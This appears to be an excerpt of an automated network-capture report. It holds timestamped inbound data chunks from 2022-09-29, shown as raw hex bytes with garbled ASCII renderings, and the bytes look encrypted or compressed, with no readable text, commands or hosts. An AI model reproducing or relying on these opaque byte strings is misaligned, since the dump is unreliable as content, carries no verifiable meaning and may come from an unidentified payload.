                                                                                                                                                    2022-09-29 12:59:04 UTC8721INData Raw: d9 27 af 29 e0 5d 7a 40 8f 1d 2d f7 6c 60 a1 15 5f 82 8a de fe ac 4e 12 9b 98 97 0a 40 1b ef 93 0b d8 a3 4d 33 19 d7 6f 03 d6 bb 25 c8 1d 6f a7 d0 52 18 b1 2a 5f 48 2b 83 6f 27 ff 53 3c 75 50 0d d6 40 58 07 37 1e 38 f5 a2 6d 28 b5 9b 69 8a 82 c5 11 64 ed 16 72 84 ce fa ef 67 61 54 d4 9e d6 bd 49 19 de 69 6f f2 ea 48 40 df e5 da fb a3 e5 80 c6 f3 6c 8d 04 32 df bb 86 95 89 24 ac ff 53 6e 96 b1 ff 92 ee 1c bf 5a dc 53 84 bb e0 ad 77 82 a9 d3 58 24 73 1f e0 c3 fe c6 26 74 4d d1 c7 2e 48 41 c5 2a 75 49 5f 22 38 c2 15 66 78 8a 52 f9 b9 d0 fc 5b 87 bf 41 98 6f 5e cf 8c 2c e0 f6 b1 f1 ec 64 df 76 40 f7 b8 90 2f f9 d2 49 1e 31 14 41 2b 40 5b dd 2a 53 91 c3 8a ac 27 e9 8e 90 1b d9 a7 56 2a 41 3b 7f 16 18 98 38 fe f2 b7 dc 17 71 15 e6 59 35 4b 95 e6 aa 4d f4 94 f6
                                                                                                                                                    Data Ascii: ')]z@-l`_N@M3o%oR*_H+o'S<uP@X78m(idrgaTIioH@l2$SnZSwX$s&tM.HA*uI_"8fxR[Ao^,dv@/I1A+@[*S'V*A;8qY5KM
                                                                                                                                                    2022-09-29 12:59:04 UTC8737INData Raw: 31 9c 6c 5e c2 0e 53 a8 a4 68 44 99 06 8b d8 0a 1f b8 69 46 ab cb 77 29 b2 89 7b ef ec 4d 38 7c 23 b7 de ff 9f 7c 75 99 19 c1 01 f2 9a ef e5 ea 63 e9 71 25 8b 08 a6 38 62 1c 3b c9 5f 8b 9a 46 a5 85 04 f6 6c cd 02 df e5 0e 57 4c 7b 8a ee d4 d1 d5 2c 8c d0 95 8e 2c 8c 2b 96 52 56 a4 8f c6 e8 b0 aa 57 c0 4a b9 b5 04 3c cc 8d e3 21 d1 a3 20 e6 7f 62 76 9b f7 66 ab a7 4d 19 b0 0e 3e 56 e7 d6 6e 3d a0 c8 9b a1 ec 97 f6 ec 72 15 6c 3e e3 7f c3 1a 21 4c 0f 8c 88 1d cc 01 13 9e c4 ab a9 df cb d1 d7 dd 87 fc 10 0f d7 50 64 71 83 22 20 9d ce a0 dc 13 4c d1 39 63 23 59 9e 7a 95 c0 63 44 96 bc 74 48 7e e9 b9 86 95 e4 28 a6 27 b4 4a e1 38 09 a8 bf d3 57 b2 ee 84 76 5c 73 0b 67 ea ee 88 77 42 9e e6 93 83 b0 ac e6 2c 99 d5 9e c8 0b 73 79 e5 1b 1b 49 5a f6 29 97 cb 97 b1
                                                                                                                                                    Data Ascii: 1l^ShDiFw){M8|#|ucq%8b;_FlWL{,,+RVWJ<! bvfM>Vn=rl>!LPdq" L9c#YzcDtH~('J8Wv\sgwB,syIZ)
                                                                                                                                                    2022-09-29 12:59:04 UTC8753INData Raw: 45 0d 0b 7d bf c5 3c 8a c7 9a b9 e2 58 8f d6 a0 3a 58 30 aa 96 5a f2 ec 4a ff 10 75 5a ee 6c 76 0a 73 83 d0 ca 64 19 ac 40 43 8c a4 9b 4c 82 fb 51 9f e3 19 b7 55 d9 c8 a3 4b e4 6a c8 0e 5a bd e6 6d ff 16 e0 53 fb 87 aa 47 cd f7 e3 53 4e ab a5 ce a7 36 cb b4 76 47 b4 29 17 98 1c f5 e4 07 b8 0d 34 b0 bc 27 67 83 25 40 65 12 7d c8 94 b4 7d 29 b6 d0 3b bd fe e9 5e 50 96 8b 83 de 8e 79 85 67 c9 23 a9 ea 3c de 4c ef bc c3 c7 2f fc 8f 1b 4e ba 03 e5 3b a0 5e 08 06 6b 1b 11 96 e4 08 08 4f 62 9b 29 d2 00 86 06 a1 53 0c fa a5 77 28 68 f1 7b 51 69 70 d5 2e 15 70 1a 14 98 56 2d f8 11 61 ee e7 24 75 dd 29 6b 7a b7 91 36 50 09 3c ea 9e 06 76 f0 9f 57 66 46 df 79 2d 1e 17 c1 35 d8 64 d9 67 57 0b b8 b1 66 0e e7 c8 1e b3 87 db 94 e7 75 06 a2 b6 11 e8 dc a0 e4 ff b5 39 e4
                                                                                                                                                    Data Ascii: E}<X:X0ZJuZlvsd@CLQUKjZmSGSN6vG)4'g%@e}});^Pyg#<L/N;^kOb)Sw(h{Qip.pV-a$u)kz6P<vWfFy-5dgWfu9
                                                                                                                                                    2022-09-29 12:59:04 UTC8769INData Raw: 3e 62 eb 48 1e e8 56 09 af 4e 59 85 ee 6b 34 af a1 57 1d ab 71 d1 b3 6f f2 b8 e6 e0 3b d1 89 f0 d9 8a 45 cc 87 66 0a a4 48 f7 44 d1 fc 83 38 2d be 10 57 5a fa 08 8c 8c 4d 83 46 22 9f 7a e1 91 c2 7d 3d 86 e5 96 2f e2 eb b5 39 64 3b dd 2c 6b 9b b9 68 5a 0a 82 6f b7 38 12 ea bc 44 bd be 15 bd 8a 34 7a 87 b1 1d 47 41 68 ca 0c 23 79 04 a8 cc 6e f5 71 d2 ca 57 5b 32 dc d9 55 f4 b4 ca 3d eb d0 6d f1 9c 7e 41 53 b9 2f 75 19 1d e2 2b 62 26 c4 e8 64 8f 6b ed c6 21 a7 31 dc 08 c9 09 d0 34 9f a0 71 81 bb a6 ec e2 b0 b1 f4 90 47 05 12 91 51 24 b1 7f 10 1c 68 df e6 3b 68 4c e3 2d 22 5d 20 41 fa 6b 12 45 b2 cb 2c 4b 07 02 61 34 8c 0b 63 9c c7 d2 1d f2 27 69 74 34 7d 4f cf 77 87 53 12 37 c5 d7 cf 78 52 be 81 0c db a2 03 99 15 0a de 20 82 25 03 56 78 77 e7 3d 7b 77 1d df
                                                                                                                                                    Data Ascii: >bHVNYk4Wqo;EfHD8-WZMF"z}=/9d;,khZo8D4zGAh#ynqW[2U=m~AS/u+b&dk!14qGQ$h;hL-"] AkE,Ka4c'it4}OwS7xR %Vxw={w
                                                                                                                                                    2022-09-29 12:59:04 UTC8785INData Raw: c3 ba 5f ef bb 14 91 2e eb 1f d5 a3 31 ef 39 c0 e4 27 c4 cd 27 89 8f 15 86 a1 b5 d9 5d 5d 8b 74 cd a3 a3 c9 53 26 e2 a9 dd 69 ca 11 62 2a 3d f6 a6 f8 8c bd dd 29 e6 c3 8a 65 d7 cf 4f 01 b5 1f f2 a1 f2 c0 3a 43 21 b3 50 76 75 01 05 30 b7 73 3b 08 ac 4d f4 35 e4 e7 8c 55 f2 dc d4 b9 fa 3b 98 9c bf ed 1b 84 8b af cc 2d 24 9c c0 07 eb a3 ae 99 72 78 89 76 06 98 c3 a7 1b 87 15 5c da 7d e3 87 e3 62 1f 3a 96 33 9e 10 85 4b 36 59 69 0f 4e d5 98 11 cb 4b 0d fd 34 24 15 7a 54 e7 16 d4 91 27 a0 5e 1c ff 6f e2 29 2a 04 99 c6 88 81 97 cf 71 ab 49 08 5d c9 8d 31 08 14 71 99 d7 2d a6 31 77 96 fd dc bf fc ae 73 00 fc 81 bd 14 01 12 ce f3 26 49 a2 6e a9 c9 d8 be 61 80 ae ca 28 52 65 3c 24 67 dd cd 6c b1 1a 83 a0 2c 90 10 be c0 00 1e 09 94 3f 58 cd 6d 0c 4e 6b 9b 3e 14 61
                                                                                                                                                    Data Ascii: _.19'']]tS&ib*=)eO:C!Pvu0s;M5U;-$rxv\}b:3K6YiNK4$zT'^o)*qI]1q-1ws&Ina(Re<$gl,?XmNk>a
                                                                                                                                                    2022-09-29 12:59:04 UTC8801INData Raw: 28 b2 e0 f6 12 8b 7b a9 a5 39 10 1f 64 bb e9 9c e8 da 50 e7 1f 42 f4 6f 61 60 26 17 36 96 de 70 0e 4c d4 38 51 77 99 41 c1 31 10 0e 81 47 e7 b7 70 be 53 c4 e4 ce c3 28 6e 23 65 f8 92 98 f6 c1 5b 1f c2 01 e6 e9 32 eb e1 bd 34 90 0b df a0 1f 69 98 be 1e ba 8a 47 34 50 ed f6 4d 66 0c d2 c9 bb 45 04 02 71 36 9b b1 d0 ec b6 5e 05 dc f3 36 2c 92 2a d6 f7 c2 f2 8d 69 2c d0 d9 4b d5 75 6e b1 23 ca 73 e8 e6 f0 b0 67 32 66 b5 32 6a 03 b1 b7 0f 17 8f 0f 94 d4 68 92 1c 14 e2 b2 28 9d a6 81 8f 95 6f ec 97 61 6c f6 8e 2c b7 35 fe ef a5 37 df 58 e2 7a 68 18 da 75 63 25 d5 e9 d0 5c a2 d4 f0 1c c7 35 31 98 28 a6 a9 20 c8 53 7c 65 f2 b5 d0 c9 26 1a 40 25 41 47 0a a0 bc fd 41 a6 a1 46 4f 1c 52 37 5e d5 20 0a 4d 3d a7 37 37 7b cf 07 81 79 e0 c6 23 b6 cb a2 98 1c a6 e1 8e 9c
                                                                                                                                                    Data Ascii: ({9dPBoa`&6pL8QwA1GpS(n#e[24iG4PMfEq6^6,*i,Kun#sg2f2jh(oal,57Xzhuc%\51( S|e&@%AGAFOR7^ M=77{y#
                                                                                                                                                    2022-09-29 12:59:04 UTC8817INData Raw: 61 df 7c 34 54 6f 46 64 db 81 7b d6 e1 a9 01 b4 d8 fe 71 49 1b 65 01 4a 76 c5 67 93 97 ae d3 aa d4 a1 d1 57 89 6c 4a 01 a7 a9 46 0b e3 7e a5 65 f7 75 9d c2 6a af 6b f1 19 fb fb c3 c5 eb 44 80 05 d1 c9 fd bf 8c cd 43 59 25 a5 63 69 7d 43 c1 ce 43 49 70 15 89 7f ba 66 88 da 19 59 1e 5b e7 9b 09 eb 19 d5 e4 f9 6f 25 86 cd e2 d3 fb c3 a6 29 f5 b4 07 90 29 b4 63 a5 1a 8d 38 97 47 06 d2 65 cb 29 12 c3 f5 c9 8d 00 b8 e5 d8 09 a8 56 5e f0 e2 f6 13 5d f0 55 97 37 64 ac a9 e8 de 8a 4b fb 61 c6 34 f5 52 10 76 71 36 5b 12 3f 43 6a 4d 47 c8 71 ab 1b a9 c1 f7 e7 c2 77 6d d4 15 18 df f6 68 2b 47 c2 70 29 b9 9d 3f 9f 99 39 ef b1 be 77 b0 cd 62 d9 4f 9a 40 dd a0 6a 53 f6 8a d4 29 f6 b5 7a 0e fb 8f 7b 59 8c 57 50 c6 be 6d f5 61 db 21 63 92 84 0e 5a 8a 0e ea 8c f4 bf 5b f1
                                                                                                                                                    Data Ascii: a|4ToFd{qIeJvgWlJF~eujkDCY%ci}CCIpfY[o%))c8Ge)V^]U7dKa4Rvq6[?CjMGqwmh+Gp)?9wbO@jS)z{YWPma!cZ[
                                                                                                                                                    2022-09-29 12:59:04 UTC8833INData Raw: ae 56 64 75 b7 bc d5 31 df 7e a2 47 ab d6 6b 85 b7 a2 ee 62 20 d7 3d 84 0b 5c 9c e2 ad c4 84 1b 59 de 7c 9a 9b 9f d6 01 01 82 89 de 14 77 a6 dd 22 1b 9d 7f b3 9b 4c 39 41 d9 86 6d 73 11 2b f6 63 60 7d e4 34 45 3c 2f 2e ef fc 57 2e a8 00 27 e6 23 5c 01 c4 d0 5c dd 9c 9e 8d e8 b6 e0 9f 04 2c f0 ad aa d2 be f1 85 cd 6f 4f d5 be 26 b8 df 62 44 6c 13 89 ab 2a 9f c4 de ab c3 74 8a 7b 9b 49 c4 b3 0b 28 1b 33 c6 63 74 52 98 1d 66 23 47 0f 54 d9 9a 67 db c7 5b 8f 5e d4 db 86 2b 07 59 33 68 63 d7 fe 9e ba ca 57 ce 26 aa ff af 07 fc ab e0 5c a7 f4 7b 34 5f 10 95 70 be 05 3b f0 c6 b8 8e 5a a8 62 11 35 ef 2c 5c ff 97 04 3d 30 d2 a3 cb 07 04 2a 0c be 02 a2 11 12 3e af 33 88 fe e9 9c df 9a 97 1c c9 73 3e e9 f0 f6 57 09 ff fc fc c3 9d 23 85 d2 17 b7 03 63 fa 8b 6e fd 9b
                                                                                                                                                    Data Ascii: Vdu1~Gkb =\Y|w"L9Ams+c`}4E</.W.'#\\,oO&bDl*t{I(3ctRf#GTg[^+Y3hcW&\{4_p;Zb5,\=0*>3s>W#cn
                                                                                                                                                    2022-09-29 12:59:04 UTC8849INData Raw: fb 62 de 24 3d c7 40 4c 8a b4 56 97 4b f2 a0 d0 b8 1e 06 ab f3 ba 2c e8 d4 57 1e 7c 73 c3 d7 c1 56 a2 97 15 68 63 22 4c 37 29 75 0f 60 d2 1c 1a ed 48 39 48 92 2f b9 c2 fa 16 72 f4 f0 ac a3 37 9b 65 96 e0 02 d8 a3 42 7e 76 d9 6f 98 08 21 7a 4e 4f 64 fc bf 1d 21 3e d2 6e 47 dc 37 a5 4e 1f dd 1b cd 46 a3 67 7e a9 4e 69 f1 1c 1e ad 6e 1f 99 69 f6 49 55 54 3a 7e 98 e4 e6 79 d6 ae 52 51 b4 24 cc ba cf 6a bf 9e f7 89 39 39 b1 d9 39 78 12 34 6c 29 0f d4 14 0b 99 32 82 98 37 73 91 13 61 5f ef 12 49 dd b0 13 e4 0b c4 15 8f 00 8a e7 2d 46 e3 4a a7 3c 97 1c 9f 69 9b 82 b9 54 50 c6 d8 19 ab 71 7c 33 5f ed b0 23 39 c4 f3 be 2a 43 c8 b5 6b c3 ad 1b 25 19 d1 49 02 8f c5 58 be 03 46 5c fc d9 2b 03 e2 72 e0 8a de f6 88 3f 62 4d c3 1c 8a c5 10 65 00 f4 1b b3 0a 7f ac b3 29
                                                                                                                                                    Data Ascii: b$=@LVK,W|sVhc"L7)u`H9H/r7eB~vo!zNOd!>nG7NFg~NiniIUT:~yRQ$j999x4l)27sa_I-FJ<iTPq|3_#9*Ck%IXF\+r?bMe)
                                                                                                                                                    2022-09-29 12:59:04 UTC8865INData Raw: 22 8e b8 fa 1d 66 2f 8b d8 5e 09 6f 9d 21 b9 5e d0 42 12 bd 18 cf 65 80 5b b2 85 c1 23 b8 3a 2b 57 7b 66 63 73 67 e9 bb be 9c 68 62 31 ef 63 0c 63 d4 39 e9 a4 c0 42 a9 19 c8 87 64 77 aa 10 ec 1a ed 3b 2b b1 39 e7 42 d4 31 45 a8 17 bb 4d ae 93 77 03 bc 20 94 60 32 c7 f8 50 9a 1d b1 88 c3 64 70 97 66 a7 a2 66 c4 03 62 05 24 42 2a 99 14 ef 3c 00 22 c8 67 3c 3c ee 3c 50 d8 db 24 47 e7 ea cf b6 c3 f5 c2 7b bc 7a c7 77 d0 e6 77 27 e0 34 1d 99 83 34 7b f4 55 73 3c 5b 5c 10 96 87 40 91 35 d1 cf e9 2b 63 25 48 a5 98 2b 12 83 03 1f f8 c8 07 ae ef 37 69 30 62 7d af 85 d2 fb 94 04 53 ee 14 ac f1 ef 80 cc 21 22 5b 4c ca 04 1a e4 f6 ab 4d 18 19 d8 50 78 d0 3b 93 e0 05 a5 31 9d 09 3d d3 fa 68 08 10 42 92 89 ea e7 72 48 61 8b 56 32 30 f1 51 8e b5 5b d3 c9 a1 89 90 c8 fa
                                                                                                                                                    Data Ascii: "f/^o!^Be[#:+W{fcsghb1cc9Bdw;+9B1EMw `2Pdpffb$B*<"g<<<P$G{zww'44{Us<[\@5+c%H+7i0b}S!"[LMPx;1=hBrHaV20Q[
                                                                                                                                                    2022-09-29 12:59:04 UTC8881INData Raw: 68 17 13 e3 3f 2e 7e 7a b0 d6 13 f9 27 48 95 e3 0f 0b d8 5f 93 4c c4 22 15 d8 2b 05 90 4b 14 b9 a0 a7 3b 58 a3 c0 53 d8 45 57 0d 07 f4 4f 28 8c 78 42 08 df 6c 34 a7 c9 ab 2b 6c f0 c4 43 cf a8 a7 bf 3f f6 36 bf 51 5d 8a a8 4d a8 a3 29 d2 41 71 55 81 26 94 5e 85 59 52 5e f3 0e 8a 4c d5 1b 78 c9 16 9f a6 12 1e bf 10 2b 44 0c 7b fe f7 01 6a ac 02 2a 4b e6 7d 68 79 e6 29 36 91 d4 54 dc 41 d5 11 4a bd 1f 64 65 9d bb 52 de 09 9d aa ef 32 21 c0 75 db 43 f7 11 60 95 a8 b2 6c 01 8e 40 a3 87 37 83 08 20 aa 47 77 ba 10 0a 44 c7 34 66 cf 62 f0 45 c6 d9 07 28 66 d5 fd d4 29 62 0f 4f 5c 76 bb e3 7e c9 2e 79 07 33 dc 2f 91 4b df b5 70 11 09 8e 21 d9 be dd 0e d9 bf b9 cf 60 d3 7c 1a d8 85 18 6b 56 e9 7b 1d 4a f3 3b 1e c1 64 9b da 4a 83 0d 9c b6 c3 6c d2 df f1 1d 13 f4 8e
                                                                                                                                                    Data Ascii: h?.~z'H_L"+K;XSEWO(xBl4+lC?6Q]M)AqU&^YR^Lx+D{j*K}hy)6TAJdeR2!uC`l@7 GwD4fbE(f)bO\v~.y3/Kp!`|kV{J;dJl
                                                                                                                                                    2022-09-29 12:59:04 UTC8897INData Raw: cf e4 78 29 df e8 4c ee b1 1d 67 12 34 f1 62 5d 6a 2b 03 05 27 45 39 5e ce 06 7e d2 33 51 de 39 9d 8d a3 48 78 49 b4 2c d8 bf 4b 86 fe 63 91 18 8a 85 dc ea ed 34 60 c7 a7 24 9e 61 12 13 80 ee d6 be cd 5f 2d d6 3a 6b c1 df 01 0d 90 a7 79 b0 75 ef ed 6d d5 71 f3 e0 b6 4a 67 78 ee bf a9 cc 30 14 1e 34 c0 65 7e 15 7b 4c 79 22 a1 8e 10 9c 3b e9 3b 1d 54 7f 4c fc 28 fb ff e5 4b 32 3e 98 91 8b 7a 61 1b 7c 5e 0f b3 aa e9 5c 4e cb df 9a 2c ae 2f b3 bb 59 94 8d 28 26 64 28 a1 b4 38 0c 17 2a fb 3f 53 76 67 97 31 7f 05 9f 5b 10 5c 81 fb a0 86 ac 9e 8a f3 c7 86 5a 9d 7a d3 4c 80 52 5c dc ee 82 e2 0e da b0 6e 79 fb e5 c2 0b 44 3f 5b 66 cc df a1 93 2c 28 6a 53 92 4b 76 c6 b6 34 dd f6 87 f7 71 a0 75 85 92 c3 2b 5b 81 1c 0e ab 29 f1 01 b0 99 71 0d be 06 05 b0 2d 97 41 06
                                                                                                                                                    Data Ascii: x)Lg4b]j+'E9^~3Q9HxI,Kc4`$a_-:kyumqJgx04e~{Ly";;TL(K2>za|^\N,/Y(&d(8*?Svg1[\ZzLR\nyD?[f,(jSKv4qu+[)q-A
                                                                                                                                                    2022-09-29 12:59:04 UTC8913INData Raw: 17 8e c3 6f 36 80 a5 0e e5 af 30 b3 b3 67 96 08 cd 6a 07 f1 59 36 24 14 c6 bb 02 04 c1 e0 05 3c de 7e c0 61 ab 1b 4d 4c 68 4f 7b 71 4d fd a4 2a 57 2c bd af 42 d8 d0 1b 8c 34 71 f2 ac af ce 16 ea f0 cc fe c7 a8 dc 73 00 5d ab d3 98 fe 02 92 21 2c 1e 8e ef 5c 2d 03 49 60 08 42 4e d8 56 d4 82 45 1c 58 a3 78 04 bf 61 1d db 25 e6 57 86 ee 3f ef 4a a4 ae 32 bf 45 24 b7 d8 52 be fd 50 31 26 b9 f0 95 d2 b7 3c 1d 22 67 e8 4a 4c 40 de 78 df c0 17 1d 8a 11 69 8b 15 00 49 fa 2f 10 fb b8 52 61 48 2b a6 c4 f7 58 6c 9a 00 9b 6c 35 43 ef 41 4b cc 41 81 e7 14 e7 fb b8 24 32 27 85 b5 7f ab 66 99 76 4a 2c 6a d6 d1 8c 63 81 e9 12 7f 25 ea 1f 96 c1 0c c1 57 4a 28 fe 07 15 68 2f 77 83 a9 18 15 66 44 d2 99 de 71 03 c7 86 39 7f 36 b4 f1 a9 d8 1c ca c4 22 a8 b4 33 03 a2 76 5d 4e
                                                                                                                                                    Data Ascii: o60gjY6$<~aMLhO{qM*W,B4qs]!,\-I`BNVEXxa%W?J2E$RP1&<"gJL@xiI/RaH+Xll5CAKA$2'fvJ,jc%WJ(h/wfDq96"3v]N
                                                                                                                                                    2022-09-29 12:59:04 UTC8929INData Raw: 4e 68 f6 25 93 e9 78 81 25 86 38 f7 c1 00 43 fb f1 1f f0 dd 48 99 69 ca b4 3c 6f 0f 3c ef 0d 72 d6 00 35 90 7a 9b f7 76 eb da e6 e2 39 ad 5f 7c 3f 65 c7 32 46 ef 8f 20 76 72 d8 96 13 2a c0 7b eb 1c 3a 42 2d e5 1c 50 65 a8 49 99 bd 5e b6 80 fe 0d 3d a4 16 05 1c 89 0e 86 1b b9 4c 91 d7 1c 41 4d ab f0 ce df 52 e9 a0 9b 70 d5 e7 64 39 30 43 57 07 0d 49 47 39 c7 b6 82 5d d7 2d a5 e9 ea 5f af c4 7f 07 68 f2 74 15 a7 77 c3 c1 c8 3d 85 ed 05 cc 9c f7 39 36 70 d4 c7 6f d9 5a 0b 53 69 11 14 d7 18 14 a1 1b 67 1d fb 1e 36 6f f5 a4 1d 59 f6 fb 07 e5 9d e6 2d e4 3f ab 5a 6d 60 b5 3f c0 9f 99 0d b0 62 19 a7 39 0d 9a 46 01 34 ce e7 41 0e fd a3 63 e9 9d b3 49 27 cd 4b b9 20 a6 12 b2 92 be 3f 72 0b df 25 ca 07 79 3c d8 15 e5 a9 c9 aa 6c b0 77 52 c0 a1 88 0e 8a 6b 20 be 4e
                                                                                                                                                    Data Ascii: Nh%x%8CHi<o<r5zv9_|?e2F vr*{:B-PeI^=LAMRpd90CWIG9]-_htw=96poZSig6oY-?Zm`?b9F4AcI'K ?r%y<lwRk N
                                                                                                                                                    2022-09-29 12:59:04 UTC8945INData Raw: e1 62 06 f9 52 a6 f2 72 90 6e 0f 82 8e 64 1d f8 63 9c b5 ca fb b9 1e bd 34 a1 2d e5 92 96 85 72 1c 8a 57 22 29 8d af ce 02 5c 5d a4 a0 19 a1 27 d0 91 07 41 29 ba ca da ae eb b2 2e 90 02 e7 38 b2 a0 75 07 c0 03 61 86 b4 86 9f 12 87 0c fb f3 70 24 e9 74 dc c3 f0 8f ba c5 7f b7 7b 99 e3 46 f5 55 5f 8f 8f 1f 28 b0 57 0a 4b ce 3a 80 70 59 8c 19 05 34 0d 15 59 08 5a 1b 1d a3 8f 91 25 cd 7e 11 43 89 94 0f 1c d6 88 3d 14 93 56 d3 bb 14 32 ff a0 8b 7a 3f 17 2b 9b a5 58 88 92 59 e5 c6 d3 30 42 78 73 ca 48 0e 00 d2 24 ee ee e7 c9 43 4b 1e 3e ac 3f fe ae 18 c6 67 df 92 a6 67 bd 42 71 dc 73 76 50 93 6b 36 92 e0 0d 3f c4 6e 81 10 7a 82 aa 08 76 f2 db bb 17 a5 51 b3 72 7f 2d 87 29 ad d2 a1 7b b7 4d de 9b 1a fa ac 5d 64 87 1b 24 4c cd 6b e3 c1 01 27 58 9e 39 da bf 2c 3a
                                                                                                                                                    Data Ascii: bRrndc4-rW")\]'A).8uap$t{FU_(WK:pY4YZ%~C=V2z?+XY0BxsH$CK>?ggBqsvPk6?nzvQr-){M]d$Lk'X9,:
                                                                                                                                                    2022-09-29 12:59:04 UTC8961INData Raw: c9 cd 3b a4 08 e3 03 1b 94 65 32 aa 86 75 89 78 e5 98 7a de 12 f2 02 95 c4 1a 38 67 73 b2 7a a0 d6 3f 84 91 aa 90 67 96 11 f8 4a 1a e8 cc 8f 06 c1 86 59 43 c8 df f9 6c 80 ab 2b c6 21 1b 32 e5 54 68 d2 e3 84 91 70 a9 65 9e 25 26 cc 5a ab 3d 82 23 85 da c3 0d e5 b1 ef 4e 72 13 20 93 ac 69 fa a7 7e 9f f4 4a fc d4 27 42 30 86 22 a7 87 ed b4 e1 d3 44 69 39 e1 f6 60 11 bd 32 3e 3e a3 cb e5 2d b9 f7 e3 92 6e 74 b7 c5 0e ae f3 3c c0 6d 04 16 30 7f 6f c9 bb 0d e5 90 65 82 1e 83 9a 60 f3 92 e1 35 61 47 10 71 97 d9 0a 03 d8 1e 65 0a 06 0f 07 f8 e5 22 7c ce b9 ec 0e 75 ec f4 aa f2 3e b7 a6 d0 69 28 3d 29 21 8a 53 f5 d4 09 3b 14 c6 4b 50 33 91 87 39 4b 8d 02 17 09 3b 55 87 29 4b b3 e5 a7 30 25 77 bb 32 c8 f5 68 ad 60 b1 ce 68 f7 20 e4 29 c8 5d a4 81 27 5f e1 83 a4 b7
                                                                                                                                                    Data Ascii: ;e2uxz8gsz?gJYCl+!2Thpe%&Z=#Nr i~J'B0"Di9`2>>-nt<m0oe`5aGqe"|u>i(=)!S;KP39K;U)K0%w2h`h )]'_
                                                                                                                                                    2022-09-29 12:59:04 UTC8977INData Raw: b9 4b f9 b4 ec ce c6 6e ac 35 f2 ee f8 73 f7 bb d1 bc 0a f8 fb 79 12 7c f0 14 50 11 79 e2 21 f3 c3 6e 89 0c a8 01 c2 06 5f 0d 07 6a 44 0b 73 0d 1f 4d 44 f5 90 e4 d0 1b 7c 01 8b 11 a4 92 d9 96 f4 6e 9d 00 cb f9 d1 a7 80 37 54 40 63 db 02 1b c0 8e d6 31 3b b2 08 e6 ba 22 52 47 0f 45 36 0b af 3f 33 fb c8 43 c5 1a 16 45 10 b1 c2 42 d6 59 d1 14 68 80 13 5b 99 41 69 46 b1 95 e5 89 9c d0 69 ba 9e a2 99 7a de 97 13 2f 91 16 23 f9 5e 9a d5 49 01 3f 5a c2 6b a9 91 73 81 17 44 1b 28 4e 0e 84 00 86 60 52 b9 cf 4d 8f f8 b0 b1 45 21 de d4 18 db dd ed 22 90 34 66 5f 61 4d de f5 57 d7 07 ea 0e 7b 44 8f 37 96 90 4a cc b0 2d 6a f6 20 ea ef c1 d6 47 20 de ec 56 07 28 17 48 12 6d d4 be 5f 56 c1 0c 0e 4b 31 e5 1b 52 fd ec 41 c7 02 52 2a df 87 0b 41 91 b1 99 8d 38 af 20 42 23
                                                                                                                                                    Data Ascii: Kn5sy|Py!n_jDsMD|n7T@c1;"RGE6?3CEBYh[AiFiz/#^I?ZksD(N`RME!"4f_aMW{D7J-j G V(Hm_VK1RAR*A8 B#
                                                                                                                                                    2022-09-29 12:59:04 UTC8993INData Raw: 0d cb e0 84 e5 0e 84 f3 80 17 81 5c e7 af c2 67 06 00 ee 1b a9 54 d9 d3 9e 4a b2 7c 00 00 e9 8c 05 f1 b0 a3 c9 a2 b4 4c 91 54 bf 49 a9 0d 50 2d ea e9 db 3c 34 e9 6a 18 3b 1c f9 d1 46 ad 4c 66 46 55 ec e4 b5 47 3c 0f 0a 9d d6 77 13 78 1c a9 ab b0 35 cf d1 ae 98 4a 83 39 9a 08 91 42 83 78 f2 5b 09 14 0b 00 69 bf 26 89 7f a8 24 28 d1 7f 18 ea 0a 17 7c fe 72 11 a1 c4 1d 18 2f 3f d6 e9 48 5c d2 5b 32 fc 55 da 2d 3b 23 aa 68 c5 a3 c3 c8 a3 19 78 57 c6 41 86 fb 39 da b0 27 0a 8d 6d 18 70 39 72 fa b0 0a 60 0f 10 ee 43 72 4d bf 34 39 22 56 fb f1 ce 77 a1 ea 34 f6 cc a9 a4 dd ef 7d 0b 66 80 e9 51 03 20 59 ea 5e cd 65 75 7d 18 18 1a a3 5f e9 30 57 87 2b 8d 0d bc 9d f4 10 5d cc 6c b3 39 e3 fc 82 6a fa e5 d6 60 8e 26 0c 6f 51 ab 22 9d d8 98 97 ba 8f 91 b7 63 87 68 e7
                                                                                                                                                    Data Ascii: \gTJ|LTIP-<4j;FLfFUG<wx5J9Bx[i&$(|r/?H\[2U-;#hxWA9'mp9r`CrM49"Vw4}fQ Y^eu}_0W+]l9j`&oQ"ch
                                                                                                                                                    2022-09-29 12:59:04 UTC9009INData Raw: 78 61 c9 5c df 7f ce 19 78 63 98 c8 15 a4 41 86 f0 72 55 ed 84 f4 9a 36 6b 07 29 a9 29 7b 4b 4c d8 3f 19 bf 98 1a d0 1f e8 a6 33 bd ab 20 aa 65 c4 75 d6 bf b6 81 35 32 4f 24 fe 04 e0 8f 42 03 a3 58 6c be 46 37 43 ab 82 e6 76 9c fc 63 e8 52 ff 84 5c 74 8c 77 47 22 aa 1e f4 71 e2 24 2b b5 e1 fb 92 b4 d0 27 81 3f cf a6 e6 14 de d4 b3 aa 62 7d 20 0a 63 ab c9 78 f4 9e be 37 5d 82 45 b7 c3 f4 98 14 56 91 ff 9f 1b 7b f5 54 ce 44 98 9d 0f 73 ac f6 f5 e5 89 03 53 98 3c c2 ea d3 8f 64 d4 57 98 db c3 e7 fb 70 25 91 09 8a a4 3e 7f 26 ea da 77 ba 20 df 58 83 0d 25 d1 50 36 bd 57 c3 88 8c a0 2f fa d1 0d 45 f3 63 cb 3c 26 42 24 0c d0 b3 a9 7f 03 e7 ab 7c f9 e6 ab 2b 78 f3 bf 24 e8 d6 c4 d3 73 bd 95 cc 64 50 ff 62 ea ec 0c 71 49 4e 6d 90 65 8f 6f 15 57 25 d4 2a 1a d5 c2
                                                                                                                                                    Data Ascii: xa\xcArU6k)){KL?3 eu52O$BXlF7CvcR\twG"q$+'?b} cx7]EV{TDsS<dWp%>&w X%P6W/Ec<&B$|+x$sdPbqINmeoW%*
